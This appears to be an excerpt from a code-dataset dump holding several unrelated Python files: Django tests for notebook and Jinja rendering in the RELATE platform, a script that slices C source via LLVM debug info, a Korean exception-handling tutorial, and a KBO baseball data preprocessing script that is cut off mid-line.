    '\nCODE_CELL_PRINT_STR1 = \"This is function1\"\nCODE_CELL_PRINT_STR2 = \"This is function2\"\nRELATE_IPYNB_CONVERT_PRE_WRAPPER_TAG_NAME = \"relate_ipynb\"\n\n\ndef strip_nbsp(s):\n \"\"\"\n Returns the given HTML with ' ' (introduced by nbconvert) stripped\n \"\"\"\n from django.utils.encoding import force_text\n return force_text(s).replace(' ', '').replace(u'\\xa0', '')\n\n\ndef get_nb_html_from_response(response):\n from django.utils.safestring import mark_safe\n return strip_nbsp(mark_safe(response.context[\"body\"]))\n\n\nclass NbconvertRenderTestMixin(SingleCoursePageSandboxTestBaseMixin):\n def assertIsValidNbConversion(self, response): # noqa\n self.assertNotContains(response, MARKDOWN_PLACEHOLDER)\n self.assertNotContains(response, \"```\")\n self.assertNotContains(response, \"# First Title of Test NoteBook\")\n self.assertNotContains(response, \"# Second Title of Test NoteBook\")\n self.assertNotContains(response, RELATE_IPYNB_CONVERT_PRE_WRAPPER_TAG_NAME)\n\n def setUp(self):\n super(NbconvertRenderTestMixin, self).setUp()\n patcher = mock.patch(\"course.content.get_repo_blob_data_cached\")\n self.mock_func = patcher.start()\n self.mock_func.return_value = TEST_IPYNB_BYTES\n self.addCleanup(patcher.stop)\n\n\nclass NbconvertRenderTest(NbconvertRenderTestMixin, TestCase):\n\n @classmethod\n def setUpTestData(cls): # noqa\n super(NbconvertRenderTest, cls).setUpTestData()\n cls.c.force_login(cls.instructor_participation.user)\n\n def test_full_notebook_render(self):\n resp = self.get_page_sandbox_preview_response(QUESTION_MARKUP_FULL)\n\n self.assertIsValidNbConversion(resp)\n self.assertContains(resp, TEXT_CELL_HTML_CLASS, count=2)\n self.assertContains(resp, CODE_CELL_HTML_CLASS, count=4)\n self.assertContains(resp, FIRST_TITLE_TEXT, count=1)\n self.assertContains(resp, SECOND_TITLE_TEXT, count=1)\n self.assertContains(resp, CODE_CELL_PRINT_STR1, count=2)\n self.assertContains(resp, CODE_CELL_PRINT_STR2, count=2)\n\n # backtick is properly rendered with highlight\n # for \"`5**18`\". 
though this syntax is not allowed in PY3\n self.assertContains(\n resp,\n '`5')\n\n nb_html = get_nb_html_from_response(resp)\n for i in range(1, 4):\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % i, nb_html)\n\n def test_notebook_sliced1(self):\n resp = self.get_page_sandbox_preview_response(QUESTION_MARKUP_SLICED1)\n self.assertIsValidNbConversion(resp)\n self.assertContains(resp, TEXT_CELL_HTML_CLASS, count=2)\n self.assertContains(resp, CODE_CELL_HTML_CLASS, count=1)\n self.assertContains(resp, FIRST_TITLE_TEXT, count=1)\n self.assertContains(resp, SECOND_TITLE_TEXT, count=1)\n self.assertContains(resp, CODE_CELL_PRINT_STR1, count=2)\n self.assertNotContains(resp, CODE_CELL_PRINT_STR2)\n\n nb_html = get_nb_html_from_response(resp)\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % 1, nb_html, count=1)\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % 2, nb_html, count=0)\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % 3, nb_html, count=0)\n\n def test_notebook_sliced2(self):\n resp = self.get_page_sandbox_preview_response(QUESTION_MARKUP_SLICED2)\n self.assertIsValidNbConversion(resp)\n self.assertContains(resp, TEXT_CELL_HTML_CLASS, count=1)\n self.assertContains(resp, CODE_CELL_HTML_CLASS, count=1)\n self.assertNotContains(resp, FIRST_TITLE_TEXT)\n self.assertContains(resp, SECOND_TITLE_TEXT, count=1)\n self.assertContains(resp, CODE_CELL_PRINT_STR1, count=2)\n self.assertNotContains(resp, CODE_CELL_PRINT_STR2)\n\n # code highlight functions (in terms of rendered ipynb notebook cells only)\n import six\n if six.PY3:\n self.assertRegex(resp.context[\"body\"], 'class=\"\\w*\\s*highlight[^\\w]')\n self.assertContains(resp, \" highlight hl-ipython3\")\n self.assertContains(resp,\n 'print'\n '(',\n count=1)\n\n nb_html = get_nb_html_from_response(resp)\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % 1, nb_html, count=1)\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % 2, nb_html, count=0)\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % 3, nb_html, count=0)\n\n def test_notebook_clear_markdown(self):\n resp = self.get_page_sandbox_preview_response(QUESTION_MARKUP_CLEAR_MARKDOWN)\n self.assertIsValidNbConversion(resp)\n self.assertNotContains(resp, TEXT_CELL_HTML_CLASS)\n self.assertContains(resp, CODE_CELL_HTML_CLASS, count=4)\n self.assertNotContains(resp, FIRST_TITLE_TEXT)\n self.assertNotContains(resp, SECOND_TITLE_TEXT)\n\n nb_html = get_nb_html_from_response(resp)\n for i in range(1, 4):\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % i, nb_html, count=1)\n\n def test_notebook_clear_output(self):\n resp = self.get_page_sandbox_preview_response(QUESTION_MARKUP_CLEAR_OUTPUT)\n self.assertIsValidNbConversion(resp)\n self.assertContains(resp, TEXT_CELL_HTML_CLASS, count=2)\n self.assertContains(resp, CODE_CELL_HTML_CLASS, count=4)\n self.assertContains(resp, FIRST_TITLE_TEXT, count=1)\n self.assertContains(resp, SECOND_TITLE_TEXT, count=1)\n self.assertContains(resp, CODE_CELL_PRINT_STR1, count=1)\n self.assertContains(resp, CODE_CELL_PRINT_STR2, count=1)\n\n nb_html = get_nb_html_from_response(resp)\n for i in range(1, 4):\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % i, nb_html, count=0)\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % \"\", nb_html, count=4)\n\n def test_notebook_clear_markdown_and_output(self):\n resp = self.get_page_sandbox_preview_response(QUESTION_MARKUP_CLEAR_ALL)\n self.assertIsValidNbConversion(resp)\n self.assertNotContains(resp, TEXT_CELL_HTML_CLASS)\n self.assertContains(resp, CODE_CELL_HTML_CLASS, count=4)\n self.assertNotContains(resp, FIRST_TITLE_TEXT)\n 
self.assertNotContains(resp, SECOND_TITLE_TEXT)\n self.assertContains(resp, CODE_CELL_PRINT_STR1, count=1)\n self.assertContains(resp, CODE_CELL_PRINT_STR2, count=1)\n\n nb_html = get_nb_html_from_response(resp)\n for i in range(1, 4):\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % i, nb_html, count=0)\n self.assertInHTML(CODE_CELL_IN_STR_PATTERN % \"\", nb_html, count=4)\n\n\n# }}}\n\n\nTEST_SANDBOX_MARK_DOWN_PATTERN = r\"\"\"\ntype: Page\nid: test_endraw\ncontent: |\n # Title\n {%% raw %%}\\newcommand{\\superscript}[1] {\\ensuremath{^{\\textrm{#1}}}}{%% endraw %%}\n [example1](http://example1.com)\n {%% raw %%}\n value=${#1}\n %s\n [example2](http://example2.com)\n\"\"\" # noqa\n\n\nclass YamlJinjaExpansionTest(SingleCoursePageSandboxTestBaseMixin, TestCase):\n\n # {{{ test https://github.com/inducer/relate/pull/376 which\n # fixed https://github.com/inducer/relate/issues/373\n\n def test_embedded_raw_block1(self):\n markdown = TEST_SANDBOX_MARK_DOWN_PATTERN % \"{% endraw %}\"\n expected_literal = (\n r'
\\newcommand{\\superscript}[1] {\\ensuremath{^{\\textrm{#1}}}}'\n            '\\n'\n            'example1\\n'\n            'value=${#1}\\n'\n            'example2
    ')\n resp = self.get_page_sandbox_preview_response(markdown)\n self.assertSandboxHasValidPage(resp)\n self.assertResponseContextContains(resp, \"body\", expected_literal)\n\n markdown = TEST_SANDBOX_MARK_DOWN_PATTERN % \"{%endraw%}\"\n resp = self.get_page_sandbox_preview_response(markdown)\n self.assertSandboxHasValidPage(resp)\n self.assertResponseContextContains(resp, \"body\", expected_literal)\n\n markdown = TEST_SANDBOX_MARK_DOWN_PATTERN % \"{% endraw %}\"\n resp = self.get_page_sandbox_preview_response(markdown)\n self.assertSandboxHasValidPage(resp)\n self.assertResponseContextContains(resp, \"body\", expected_literal)\n\n def test_embedded_raw_block2(self):\n markdown = TEST_SANDBOX_MARK_DOWN_PATTERN % \"{%- endraw %}\"\n\n expected_literal = (\n r'
\\newcommand{\\superscript}[1] {\\ensuremath{^{\\textrm{#1}}}}'\n            '\\n'\n            'example1\\n'\n            'value=${#1}\\n'\n            'example2
    ')\n resp = self.get_page_sandbox_preview_response(markdown)\n self.assertSandboxHasValidPage(resp)\n self.assertResponseContextContains(resp, \"body\", expected_literal)\n\n markdown = TEST_SANDBOX_MARK_DOWN_PATTERN % \"{%-endraw%}\"\n resp = self.get_page_sandbox_preview_response(markdown)\n self.assertSandboxHasValidPage(resp)\n self.assertResponseContextContains(resp, \"body\", expected_literal)\n\n def test_embedded_raw_block3(self):\n markdown = TEST_SANDBOX_MARK_DOWN_PATTERN % \"{%- endraw -%}\"\n expected_literal = (\n r'
\\newcommand{\\superscript}[1] {\\ensuremath{^{\\textrm{#1}}}}'\n            '\\n'\n            'example1\\n'\n            'value=${#1}example2
    ')\n resp = self.get_page_sandbox_preview_response(markdown)\n self.assertSandboxHasValidPage(resp)\n self.assertResponseContextContains(resp, \"body\", expected_literal)\n\n markdown = TEST_SANDBOX_MARK_DOWN_PATTERN % \"{%-endraw-%}\"\n resp = self.get_page_sandbox_preview_response(markdown)\n self.assertSandboxHasValidPage(resp)\n self.assertResponseContextContains(resp, \"body\", expected_literal)\n\n def test_embedded_raw_block4(self):\n markdown = TEST_SANDBOX_MARK_DOWN_PATTERN % \"{% endraw -%}\"\n expected_literal = (\n r'
\\newcommand{\\superscript}[1] {\\ensuremath{^{\\textrm{#1}}}}'\n            '\\n'\n            'example1\\n'\n            'value=${#1}\\n'\n            'example2
    ')\n resp = self.get_page_sandbox_preview_response(markdown)\n self.assertSandboxHasValidPage(resp)\n self.assertResponseContextContains(resp, \"body\", expected_literal)\n\n # }}}\n\n# vim: fdm=marker\n","sub_path":"tests/test_content.py","file_name":"test_content.py","file_ext":"py","file_size_in_byte":17203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"124266205","text":"\nfrom pprint import pprint\nimport pdb\n\nfrom lib import helper\n\nclass Query:\n \n def __init__(self, val):\n \n val_words = val.split(' ')\n popped = []\n \n while len(val_words) > 0:\n search = ' '.join(val_words)\n title0 = helper.titles_of_search_query(search)[0]\n if title0.lower() == search.lower():\n self.subject = title0\n self.subquery = popped\n return\n else:\n popped.insert(0, val_words.pop())\n \n","sub_path":"lib/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"427441193","text":"#coding:utf-8\nimport sys\nimport os\nimport re\nimport pickle\n\ndef getSourceSlicer(finalf,linelist):\n slicerfile = finalf.replace('.final.ll','.slicer.c')\n tmpdir = finalf[0:finalf.rfind('/')]\n lastdir = tmpdir[0:tmpdir.rfind('/')]\n files = os.listdir(lastdir)\n sourcefile = ''\n for mfile in files:\n if mfile.endswith('.c') and finalf.find(mfile[:-2]) != -1:\n sourcefile = lastdir+'/'+mfile\n linecount = 0\n linedict = {}\n mdictpkl[slicerfile] = []\n funcandfocus[slicerfile] = []\n funcandfocus[slicerfile].append(0)\n funcnamelist = re.findall('#(.+)#',finalf)\n linenumlist = re.findall('_(\\d+):',finalf)\n funcname = ''\n if(len(funcnamelist)):\n funcname = funcnamelist[0]\n linenum = 0\n if(len(linenumlist)):\n linenum = (int)(linenumlist[0])\n with open(sourcefile) as rf:\n for line in rf:\n linecount += 1\n if linecount in linelist:\n linedict[linecount] = line\n linec2 = 0\n with open(slicerfile,'w') as sf:\n for item in linelist:\n linec2 += 1\n if item == '{' or item == '}':\n sf.write(item+'\\n')\n else:\n if item in linedict.keys():\n linetow = linedict[item]\n if linetow.find('/*#MFLAWTAG*/') != -1:\n mdictpkl[slicerfile].append(linec2)\n if linetow.find(funcname) != -1:\n funcandfocus[slicerfile][0] = linec2\n if item == linenum:\n funcandfocus[slicerfile].append(linec2)\n sf.write(linetow.replace('/*#MFLAWTAG*/',''))\n if(len(funcandfocus[slicerfile]) == 1):\n funcandfocus[slicerfile].append(funcandfocus[slicerfile][0]+1)\n \n\n\n\n\n\ndef processdbg(finalfile):\n mlist = []\n regex1 = re.compile('.+!dbg !(\\d+)')\n with open(finalfile,'r') as dbgf:\n for line in dbgf:\n num = regex1.findall(line)\n if len(num) > 0:\n mlist.append(num[0])\n if line.find('{') != -1:\n mlist.append('{')\n if line.find('}') != -1:\n mlist.append('}')\n debugfile = finalfile.replace('.final.ll','.new.ll') \n if not os.path.exists(debugfile):\n return\n comparedict = {}\n regex2 = re.compile('^!(\\d+).+line:.(\\d+),')\n with open(debugfile,'r') as debugf:\n for line in debugf:\n numdict = regex2.findall(line)\n if len(numdict) < 1:\n continue\n comparedict[numdict[0][0]] = numdict[0][1]\n linelist = []\n sourcefunclist = []\n for item in mlist:\n if item == '{' or item == '}':\n linelist.append(item)\n elif item in comparedict.keys():\n tmpline = int(comparedict[item])\n if linelist and tmpline in linelist:\n continue\n linelist.append(tmpline)\n\n linenumpkl = finalfile.replace('.final.ll','.souline.pkl')\n 
pickle.dump(linelist,open(linenumpkl,'w'))\n getSourceSlicer(finalfile,linelist)\n\n\n\n\ndef getfinal(mpath):\n sondirs = os.listdir(mpath)\n for mdir in sondirs:\n npath = os.path.join(mpath,mdir)\n if os.path.isdir(npath):\n getfinal(npath)\n else:\n if npath.endswith('.final.ll'):\n processdbg(npath)\n\nif __name__ == '__main__':\n slicerpath = sys.argv[1]\n mdictpkl = {}\n funcandfocus = {}\n getfinal(slicerpath)\n pickle.dump(mdictpkl,open('sourcedict.pkl','w'))\n pickle.dump(funcandfocus,open('funcandfocusLoc.pkl','w'))\n","sub_path":"src/NVD/tools/getsourceslice/getSourceLine.py","file_name":"getSourceLine.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"525482875","text":"#파이썬 예외처리의 이해\n\n#예외 종류\n#문법적으로 에러가 없지만, 코드 실행(런타임)프로세스에서 발생하는 예외 처리도 중요\n#linter: 코드 스타일, 문법 체크\n\n#SyntaxError: 잘못된 문법 \n#print('Tes)\n# x=>y\n\n#NameError : 참조변수가 없음\na = 10\nb = 15\n\n#print(c)\n\n#ZeoDivisionError : 0 나누기에러\n#print(10 / 0)\n\n#IndexError: 인덱스 범위 오버\nx = [10, 20, 30]\nprint(x[0])\n#print(x[3]) #예외 발생\n\n#keyError\ndic = {\"name\":\"kim\", \"age\":\"33\",\"city\":\"seoul\"}\n\n#print(dic['hobby])\nprint(dic.get('hobby'))\n\n#AttributeError: 모듈, 클래스에 있는 잘못된 속성 사용시에 예외\n\nimport time\nprint(time.time())\n#print(time.month())\n\n#valueError : 참조값이 없을때 발생\nx = [1,5,9]\n\n#x.remove(10)\n#x.index(10)\n\n#FileNotFoundError\n#f = open('text.txt',r) #예외발생\n\n#TypeError\n\nx = [1,2]\ny = (1,2)\nz = \"test\"\n#print(x + y ) #예외 결합 불가능\n\n#항상 예외가 발생하지 않을 것으로 가정하고 먼저 코딩\n#그 후 런타임 예외 발생시 예외처리 코딩 권장 (EAFP 코딩 스타일)\n\n#예외 처리 기본\n#try: 에러가 발생할 가능성이 있는 코드 실행\n#except: 예러명1\n#except: 예러명2\n#else : 에러가 발생하지 않았을 경우 실행\n#finally: 항상 실행\n\n#예제1\n\nname = ['kim', 'Lee', 'Park']\n\ntry: \n z = \"kim\"\n x = name.index(z)\n print('{} Found it! in name' .format(z,x+1))\nexcept ValueError: #어떤에러가 발생했는지 모를때 except:\n print('Not found it! - Occurred ValueError!')\nelse:\n print(\"okay! else!\")\nfinally:\n print(\"finally ok\")\n\n#예제4\n#예외 처리는 하지 않지만, 무조건 수행되는 코당 패턴\ntry: \n z = \"kim\"\nfinally:\n print(\"kim 실행\")\n\n#예제5\ntry:\n z = \"kim\"\n x = name.index(z)\n print('{} Found it! in name' .format(z, x+1))\nexcept ValueError as l: # alias l \n print(l)\nexcept IndexError:\n print(\"IndexError\")\nexcept Exception:\n print(\"Exception\")\nelse: \n print(\"OK! 
else!\")\nfinally:\n print(\"finally OK!\")\n\n#예제6\n#예외 발생 : raise\n#raise 키워드로 예외 직접 발생\n\ntry:\n a = \"Kim\"\n if a == \"kim\":\n print('Ok 허가!')\n else:\n raise ValueError #예외를 직접 만들때, \nexcept ValueError:\n print('문제발생')\nexcept Exception as f:\n print(f)\nelse:\n print(\"OK!\")","sub_path":"resource/exception.py","file_name":"exception.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"13118437","text":"import pandas as pd\nimport numpy as np\nimport warnings\nfrom sklearn.preprocessing import StandardScaler\nwarnings.filterwarnings('ignore')\nfrom sklearn.cluster import KMeans\n\ndef rawdata_preprocess():\n # loading raw data\n indiv_hit_16 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인타자_2016.csv', encoding='cp949')\n indiv_hit_17 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인타자_2017.csv', encoding='cp949')\n indiv_hit_18 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인타자_2018.csv', encoding='cp949')\n indiv_hit_19 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인타자_2019.csv', encoding='cp949')\n indiv_hit_20 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인타자_2020.csv', encoding='cp949')\n indiv_pit_16 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인투수_2016.csv', encoding='cp949')\n indiv_pit_17 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인투수_2017.csv', encoding='cp949')\n indiv_pit_18 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인투수_2018.csv', encoding='cp949')\n indiv_pit_19 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인투수_2019.csv', encoding='cp949')\n indiv_pit_20 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_개인투수_2020.csv', encoding='cp949')\n\n team_hit_16 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀타자_2016.csv', encoding='cp949')\n team_hit_17 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀타자_2017.csv', encoding='cp949')\n team_hit_18 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀타자_2018.csv', encoding='cp949')\n team_hit_19 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀타자_2019.csv', encoding='cp949')\n team_hit_20 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀타자_2020.csv', encoding='cp949')\n team_pit_16 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀투수_2016.csv', encoding='cp949')\n team_pit_17 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀투수_2017.csv', encoding='cp949')\n team_pit_18 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀투수_2018.csv', encoding='cp949')\n team_pit_19 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀투수_2019.csv', encoding='cp949')\n team_pit_20 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_팀투수_2020.csv', encoding='cp949')\n\n # load crawling data\n cr_ind_hit = pd.read_csv('./data/crawling/crawl_ind_h.csv', encoding='cp949')\n cr_ind_pit = pd.read_csv('./data/crawling/crawl_ind_p.csv', encoding='cp949')\n cr_team_hit = pd.read_csv('./data/crawling/crawl_team_h.csv', encoding='cp949')\n cr_team_pit = pd.read_csv('./data/crawling/crawl_team_p.csv', encoding='cp949')\n\n\n # concat by theirselves\n indiv_pit = pd.concat([indiv_pit_16, indiv_pit_17, indiv_pit_18, indiv_pit_19, indiv_pit_20])\n indiv_hit = pd.concat([indiv_hit_16, indiv_hit_17, indiv_hit_18, indiv_hit_19, indiv_hit_20])\n team_hit = pd.concat([team_hit_16, team_hit_17, team_hit_18, team_hit_19, team_hit_20])\n team_pit = pd.concat([team_pit_16, team_pit_17, team_pit_18, team_pit_19, team_pit_20])\n\n # sum BB+IB+HP\n 
indiv_pit['BB'] = indiv_pit['BB'] + indiv_pit['IB'] + indiv_pit['HP']\n indiv_hit['BB'] = indiv_hit['BB'] + indiv_hit['IB'] + indiv_hit['HP']\n team_pit['BB'] = team_pit['BB'] + team_pit['IB'] + team_pit['HP']\n team_hit['BB'] = team_hit['BB'] + team_hit['IB'] + team_hit['HP']\n\n # sum HIT+H2+H3\n indiv_pit['HIT'] = indiv_pit['HIT'] + indiv_pit['H2'] + indiv_pit['H3']\n\n # concat all_data with crawling data\n indiv_pit_all = pd.concat([indiv_pit[['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'TB_SC', 'P_ID', 'START_CK',\n 'RELIEF_CK', 'INN2', 'BF', 'PA', 'AB', 'HIT', 'HR', 'KK', 'BB', 'R',\n 'ER']],\n cr_ind_pit[['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'TB_SC', 'P_ID', 'START_CK',\n 'RELIEF_CK', 'INN2', 'BF', 'PA', 'AB', 'HIT', 'HR', 'KK', 'BB', 'R',\n 'ER']]])\n\n indiv_hit_all = pd.concat([indiv_hit[['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'TB_SC', 'P_ID', 'AB', 'RBI',\n 'RUN', 'HIT', 'H2', 'H3', 'HR', 'BB', 'KK']], cr_ind_hit])\n\n team_hit_all = pd.concat([team_hit[['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'TB_SC', 'AB', 'RBI', 'RUN',\n 'HIT', 'H2', 'H3', 'HR', 'SB', 'BB', 'KK', 'GD', 'ERR', 'LOB']], cr_team_hit])\n\n team_pit_all = pd.concat([team_pit[['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'TB_SC', 'WLS', 'INN2', 'BF',\n 'AB', 'HIT', 'H2', 'H3', 'HR', 'SB', 'BB', 'KK', 'GD', 'R', 'ER']],\n cr_team_pit])\n\n indiv_pit_all = indiv_pit_all[indiv_pit_all['P_ID'] != 'No_Code']\n indiv_pit_all['P_ID'] = indiv_pit_all['P_ID'].astype('int64')\n indiv_hit_all = indiv_hit_all[indiv_hit_all['P_ID'] != 'No_Code']\n indiv_hit_all['P_ID'] = indiv_hit_all['P_ID'].astype('int64')\n team_pit_all['WLS_changed'] = team_pit_all['WLS'].apply(lambda x: 1 if x=='W' else 0)\n\n return indiv_pit_all, indiv_hit_all, team_hit_all, team_pit_all\n\n\ndef add_and_concat(ind_pit, team_pit, team_hit):\n pitcher_start = ind_pit[ind_pit['START_CK'] == 1].reset_index(drop=True)\n pitcher_start = pitcher_start[['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'TB_SC', 'INN2', 'ER']]\n pitcher_team_all = pd.merge(team_pit, pitcher_start, how='inner',\n on=['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'TB_SC'],\n suffixes=('_teampit', '_sp'))\n\n team_all = pd.merge(pitcher_team_all, team_hit, how='inner',\n on=['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'TB_SC'],\n suffixes=('_pit', '_bat'))\n\n return team_all\n\n\ndef saber_stats(series):\n series['ERA'] = (series['ER_teampit'] / (series['INN2_teampit'] / 3)) * 9\n\n series['AVG_bat'] = series['HIT_bat'] / series['AB_bat']\n series['AVG_pit'] = series['HIT_pit'] / series['AB_pit']\n\n series['OPS_bat'] = ((series['HIT_bat'] + series['BB_bat'] + (\n (series['HIT_bat'] - series['H2_bat'] - series['H3_bat'] - series['HR_bat'])\n + (series['H2_bat'] * 2) + (series['H3_bat'] * 3) + (series['HR_bat'] * 4)))) / series['AB_bat']\n\n series['OPS_pit'] = ((series['HIT_pit'] + series['BB_pit'] + (\n (series['HIT_pit'] - series['H2_pit'] - series['H3_pit'] - series['HR_pit'])\n + (series['H2_pit'] * 2) + (series['H3_pit'] * 3) + (series['HR_pit'] * 4)))) / series['AB_pit']\n\n series['wOBA_bat'] = ((0.69 * (series['BB_bat']))\n + (0.89 * (series['HIT_bat'] - series['H2_bat'] - series['H3_bat'] - series['HR_bat']))\n + (1.27 * series['H2_bat'])\n + (1.62 * series['H3_bat'])\n + (2.1 * series['HR_bat'])) / (series['AB_bat'] + series['BB_bat'])\n\n series['wOBA_pit'] = ((0.69 * (series['BB_pit']))\n + (0.89 * (series['HIT_pit'] - series['H2_pit'] - series['H3_pit'] - series['HR_pit']))\n + (1.27 * series['H2_pit'])\n + (1.62 * series['H3_pit'])\n + (2.1 * series['HR_pit'])) / (series['AB_pit'] + series['BB_pit'])\n\n 
series['FIP'] = (((-2 * series['KK_pit']) + (3 * (series['BB_pit'])) + (13 * series['HR_pit']))\n / (series['INN2_teampit'] / 3)) + 3.0\n\n series['WHIP'] = (series['HIT_pit'] + series['BB_pit']) / (series['INN2_teampit'] / 3)\n\n series['ISO'] = (series['H2_bat'] + (2 * series['H3_bat']) + (3 * series['HR_bat'])) / series['AB_bat']\n series['PE'] = (series['RUN'] ** 2) / ((series['RUN'] ** 2) + (series['R'] ** 2))\n return series\n\ndef rel_w_rate(data):\n new = [['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'wins', 'loses']]\n for k in ['LG', 'OB', 'SS', 'HH', 'HT', 'WO', 'KT', 'SK', 'LT', 'NC']:\n for j in ['LG', 'OB', 'SS', 'HH', 'HT', 'WO', 'KT', 'SK', 'LT', 'NC']:\n if k == j:\n continue\n for i in range(len(data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)])):\n if i == 0:\n new.append([data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[i].G_ID,\n data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[i,].GDAY_DS, \\\n k, j, 0, 0])\n\n elif 0 < i < 5:\n win = list(data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[:i].WLS.values).count('W')\n lose = list(data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[:i].WLS.values).count('L')\n new.append([data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[i].G_ID,\n data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[i].GDAY_DS, \\\n k, j, win, lose])\n\n else:\n new.append([data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[i].G_ID,\n data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[i].GDAY_DS, \\\n k, j, \\\n list(data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[i - 5:i].WLS.values).count(\n 'W'), \\\n list(data[(data['T_ID'] == k) & (data['VS_T_ID'] == j)].iloc[i - 5:i].WLS.values).count(\n 'L')])\n return pd.DataFrame(new[1:], columns=new[0])\n\ndef count_of_avg_3(data):\n batter = data[:]\n player_list = list(batter['P_ID'].unique())\n batter = batter[['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'P_ID', 'AB', 'HIT']]\n make = pd.DataFrame(columns=['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', 'P_ID', 'AB', 'HIT', 'cum_AB', 'cum_HIT', 'AVG'])\n for i in player_list:\n player = batter[batter['P_ID'] == i]\n player['cum_AB'] = player['AB'].cumsum()\n player['cum_HIT'] = player['HIT'].cumsum()\n player['AVG'] = player['cum_HIT'] / player['cum_AB']\n make = pd.concat([make, player])\n\n make['AVG'] = make['AVG'].fillna(0)\n\n team_3hal = pd.DataFrame(columns=['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', '3hal'])\n for t in ['NC', 'LT', 'OB', 'SK', 'SS', 'HT', 'HH', 'WO', 'KT', 'LG']:\n temp = [['G_ID', 'GDAY_DS', 'T_ID', 'VS_T_ID', '3hal']]\n for j in list(make[make['T_ID'] == t].G_ID.unique()):\n ttemp = [j, make[make['G_ID'] == j].GDAY_DS.unique()[0], t,\n make[(make['G_ID'] == j) & (make['T_ID'] == t)].VS_T_ID.unique()[0]]\n ttemp.append(len(make[(make['G_ID'] == j) & (make['AVG'] >= 0.3) & (make['T_ID'] == t)]))\n temp.append(ttemp)\n temp = pd.DataFrame(temp[1:], columns=temp[0])\n team_3hal = pd.concat([team_3hal, temp])\n return team_3hal\n\ndef money():\n #load data\n sal_2016 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_선수_2016.csv', encoding='cp949').dropna()\n sal_2017 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_선수_2017.csv', encoding='cp949').dropna()\n sal_2018 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_선수_2018.csv', encoding='cp949').dropna()\n sal_2019 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_선수_2019.csv', encoding='cp949').dropna()\n sal_2020 = pd.read_csv('./data/raw_data/2020빅콘테스트_스포츠투아이_제공데이터_선수_2020.csv', encoding='cp949').dropna()\n\n\n absal_2016 = 
